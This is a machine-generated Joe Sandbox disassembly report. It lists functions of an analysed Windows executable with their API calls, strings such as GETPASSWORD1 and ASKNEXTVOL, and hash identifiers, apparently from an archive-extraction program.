Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 0732cf38cb4f408a022811eecaa63d4c29514ed653ecd3314440be17b822bf1d
Instruction ID: 840746fb8a4fd98f901521a13996ee892030422b054577bb6b5a650c534727bf
Opcode Fuzzy Hash: 0732cf38cb4f408a022811eecaa63d4c29514ed653ecd3314440be17b822bf1d
Instruction Fuzzy Hash: 0F31C571D04268BEDF11EBA4EC45BEFBBB9AF29300F044015F855A72D2D7748A94C760

Uniqueness

Uniqueness Score: -1.00%

Function 0013AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

EndDialog.USER32(?,00000001), ref: 0013AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0013ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0013ADC2

Strings

ASKNEXTVOL, xrefs: 0013AD28

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 72d7f86513cbf80cf242c7e2b63f46b569cafcdafa44710b49dca892d9c4d193
Instruction ID: 559d7cf249d7ff3b880e59531bfa23ce8c18a7fe0784be6efcc2d05f31a06d84
Opcode Fuzzy Hash: 72d7f86513cbf80cf242c7e2b63f46b569cafcdafa44710b49dca892d9c4d193
Instruction Fuzzy Hash: 7611C832280210BFD7119FE8EC45FAA776DFF5B742F840010F281DB9A0C7619A559722

Uniqueness

Uniqueness Score: -1.00%

Function 0012D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0012D954
_strncpy.LIBCMT ref: 0012D99A

Part of subcall function 00131DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00161030,00000200,0012D928,00000000,?,00000050,00161030), ref: 00131DC4

Strings

$%s, xrefs: 0012D949
@%s, xrefs: 0012D93E

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 40a71631e6c73c6b2dbd5935ef7de4a1ca87c274a83750f20cf92b4a0018d0ff
Instruction ID: c736ca75a8509ff5c338fd9b92afc79abc4c87011d0fc27df7f1f091454f02d5
Opcode Fuzzy Hash: 40a71631e6c73c6b2dbd5935ef7de4a1ca87c274a83750f20cf92b4a0018d0ff
Instruction Fuzzy Hash: 7B216072440258EEEF21EEA4EC45FDE7BE8AF15708F140512F920971A2E371D6A8CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00130E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0012AC5A,00000008,?,00000000,?,0012D22D,?,00000000), ref: 00130E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0012AC5A,00000008,?,00000000,?,0012D22D,?,00000000), ref: 00130E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0012AC5A,00000008,?,00000000,?,0012D22D,?,00000000), ref: 00130E9F

Strings

Thread pool initialization failed., xrefs: 00130EB7

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 30f013cd4527cbdef6cf4e4b8c2a3a4aadb728f4811f154ac52b22004828d2fe
Instruction ID: ced7d931851850f0ae32fa5825e881c680567afa3e090602915da97d2c655ae7
Opcode Fuzzy Hash: 30f013cd4527cbdef6cf4e4b8c2a3a4aadb728f4811f154ac52b22004828d2fe
Instruction Fuzzy Hash: 641191B17007089FC3215F6A9C849A7FBECEB68754F104C2EF1DAC7240D77159808B60

Uniqueness

Uniqueness Score: -1.00%

Function 0013B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

EndDialog.USER32(?,00000001), ref: 0013B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0013B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0013B304

Strings

GETPASSWORD1, xrefs: 0013B289

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 097847fc6c92b9905b65e891891e56344de6297b9c61d650b006af2a9c48cb02
Instruction ID: 6b72ac9a64dff633196eb385f96a453a48149d51255c44a59de35cd26e227edc
Opcode Fuzzy Hash: 097847fc6c92b9905b65e891891e56344de6297b9c61d650b006af2a9c48cb02
Instruction Fuzzy Hash: 8C110432904128B6DB219E64AC89FFF377CFF19B00F040120FB46B61C0E7A0AA5587A1

Uniqueness

Uniqueness Score: -1.00%

Function 0013DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0013DD31
REPLACEFILEDLG, xrefs: 0013DD1C, 0013DD50

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: c774937bd0189a8d82f6e90e16e9b07306d3b83b7153d8fa84f6b27f69c6bc9f
Instruction ID: 3e0160e089307017e66894bfeed0c513e8df547bbaf6a14736b0cd18a095a13a
Opcode Fuzzy Hash: c774937bd0189a8d82f6e90e16e9b07306d3b83b7153d8fa84f6b27f69c6bc9f
Instruction Fuzzy Hash: AD018476604245EFDB118FA8FC44A967BB9F7083A8F044525F815D3AB0CB7198D0DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00149A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00149AA9
__alldvrm.LIBCMT ref: 00149CAA
__alldvrm.LIBCMT ref: 00149CCC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: 4eac2f9ffababf2653c625487e1884a8c83d21804752c1eff082b74223764b97
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 6BA13872D043869FEB25CF68C891BAFBBE5EF65310F2841ADE4859B2A1C7389D41C750

Uniqueness

Uniqueness Score: -1.00%

Function 0012A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00127F69,?,?,?), ref: 0012A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00127F69,?), ref: 0012A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00127F69,?,?,?,?,?,?,?), ref: 0012A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00127F69,?,?,?,?,?,?,?,?,?,?), ref: 0012A4C6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: a85c5ab1525bb8a988b054a92ba5b0705ebf183163ee29b3ef90c0208f3aefb9
Instruction ID: 1c0089ed3deaafeb2be38b5b2ac1c35e2bfb89d8e78d69535d58eb7b147e307a
Opcode Fuzzy Hash: a85c5ab1525bb8a988b054a92ba5b0705ebf183163ee29b3ef90c0208f3aefb9
Instruction Fuzzy Hash: 1C41BE31248391ABD721EF24EC45FAEBBE4AF94700F480919B6E1971C0D7A4DA5CDB53

Uniqueness

Uniqueness Score: -1.00%

Function 00121100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0012112B
_wcslen.LIBCMT ref: 00121153
_wcslen.LIBCMT ref: 00121182
_wcslen.LIBCMT ref: 001211A9

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 56055abfe1fd5bfc2e666ec8fde86ca206313e1ad1fd0f5a2ae9a9c5694942a1
Instruction ID: d0dd202ca79cec5a8809a444b1e073927d8affc4471ce54b3036622d0868e62b
Opcode Fuzzy Hash: 56055abfe1fd5bfc2e666ec8fde86ca206313e1ad1fd0f5a2ae9a9c5694942a1
Instruction Fuzzy Hash: EB41E371900669ABCB21DF68DC4A9EF7BB8EF14310F140029FD56F7255DB30AE598BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0014C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001491E0,?,00000000,?,00000001,?,?,00000001,001491E0,?), ref: 0014C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00146CBE,?), ref: 0014CA70
__freea.LIBCMT ref: 0014CA79

Part of subcall function 00148E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014CA2C,00000000,?,00146CBE,?,00000008,?,001491E0,?,?,?), ref: 00148E38

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e6ca96fa9c2fe8312877ca645f835bb5b85de3f21140a23948930d457dd9e5cb
Instruction ID: dc96e90ba00c8f58d6fff10a2911461a62b90bd20fc242387d1d50c92e765a7a
Opcode Fuzzy Hash: e6ca96fa9c2fe8312877ca645f835bb5b85de3f21140a23948930d457dd9e5cb
Instruction Fuzzy Hash: 3631AE72A0121AABDB25DF64CC41DAE7BA5EB01310F154128FC15EB260EB35CD90CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0013A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0013A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0013A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0013A683
ReleaseDC.USER32(00000000,00000000), ref: 0013A691

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1d0b23cfd488acf690888036a47df47acfea5dcb264c283d9caf3bde9b7fe60f
Instruction ID: 723c50660ee4c53fad54a330b1451a80f35b2cc4dda945265461864794c16e7d
Opcode Fuzzy Hash: 1d0b23cfd488acf690888036a47df47acfea5dcb264c283d9caf3bde9b7fe60f
Instruction Fuzzy Hash: 6CE01231942721B7D3615B61BC4EBCB3E54AF05F52F090201FA15AA5D0DFB487808BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0013A699: GetDC.USER32(00000000), ref: 0013A69D
Part of subcall function 0013A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0013A6A8
Part of subcall function 0013A699: ReleaseDC.USER32(00000000,00000000), ref: 0013A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0013A83C

Part of subcall function 0013AAC9: GetDC.USER32(00000000), ref: 0013AAD2
Part of subcall function 0013AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0013AB01
Part of subcall function 0013AAC9: ReleaseDC.USER32(00000000,?), ref: 0013AB99

Strings

(, xrefs: 0013A9AA

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: a20959e052e544cfcdaa762c2d32c276529f80ca24a68bc467d64986a1d8e9d8
Instruction ID: 7423b05e8d5cad7643747161feb4372fbf506a60facd9ae68e0f1e0136a2bf09
Opcode Fuzzy Hash: a20959e052e544cfcdaa762c2d32c276529f80ca24a68bc467d64986a1d8e9d8
Instruction Fuzzy Hash: 0591F071608754AFD711DF25C844A2BBBE8FFC9701F00495EF9AAD7260DB30A945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001275E3

Part of subcall function 001305DA: _wcslen.LIBCMT ref: 001305E0

Part of subcall function 0012A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0012A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012777F

Part of subcall function 0012A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A501
Part of subcall function 0012A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A532

Strings

:, xrefs: 00127654

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 3a85bf18ae572a1c46046e30dcc42d2b30965e8c3365d2a93ef41af5ca824936
Instruction ID: 91cedbd382269a5b3ec4d237971dbb4d16332d67ec78d95dc247730e32bffbf1
Opcode Fuzzy Hash: 3a85bf18ae572a1c46046e30dcc42d2b30965e8c3365d2a93ef41af5ca824936
Instruction Fuzzy Hash: 85419371800268AAEB25EB64EC59EEFB37DAF65300F0040D6B605A3092DB745F95CF70

Uniqueness

Uniqueness Score: -1.00%

Function 0013B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0013B4E3
_wcslen.LIBCMT ref: 0013B4FE

Strings

}, xrefs: 0013B4D6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 0853f6de68c931666096a73e0cc0392bdc36409aa84be894710f3136f17479b2
Instruction ID: d0c72602739f6be465030e12ee0761f19aff94f977e9a730319d238600190a4d
Opcode Fuzzy Hash: 0853f6de68c931666096a73e0cc0392bdc36409aa84be894710f3136f17479b2
Instruction Fuzzy Hash: 6821027290931A5ADB31EA64D885F6FB3ECDFA1750F04042AF784C7141FB64DD4883A2

Uniqueness

Uniqueness Score: -1.00%

Function 0012F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0012F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0012F2E4
Part of subcall function 0012F2C5: GetProcAddress.KERNEL32(001681C8,CryptUnprotectMemory), ref: 0012F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0012F33E), ref: 0012F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0012F3CA
CryptProtectMemory failed, xrefs: 0012F389

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: ff4529c87589f6dd833a1bd05053b66f1f80a25d62d8f2a1820f35cbf04c361d
Instruction ID: 645c6bdda6d5588e4ca4b57c2e79e71193fe7da8352c4f8970b185098a59c803
Opcode Fuzzy Hash: ff4529c87589f6dd833a1bd05053b66f1f80a25d62d8f2a1820f35cbf04c361d
Instruction Fuzzy Hash: AA11B132600639ABEF25AF20ED45A6E3764FF05760F14423AFC516B291DB749E62C690

Uniqueness

Uniqueness Score: -1.00%

Function 0012B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0012B9B8

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

Strings

%c:\, xrefs: 0012B9AE

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 1b8d370ce07b6a86709989b7e5a93bb6152fc72dcac0b78d4be7e613ebd6d195
Instruction ID: 56dde4cbb236e712abef4756af5fb182dc1f9a9bb39dc15fec1b6fe5a04a84ac
Opcode Fuzzy Hash: 1b8d370ce07b6a86709989b7e5a93bb6152fc72dcac0b78d4be7e613ebd6d195
Instruction Fuzzy Hash: 0801F96351832165DA346B75ACC5D6BB79CEFA57B0B50440AF554D7082EB30E4A483B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00131160,?,00000000,00000000), ref: 00131043
SetThreadPriority.KERNEL32(?,00000000), ref: 0013108A

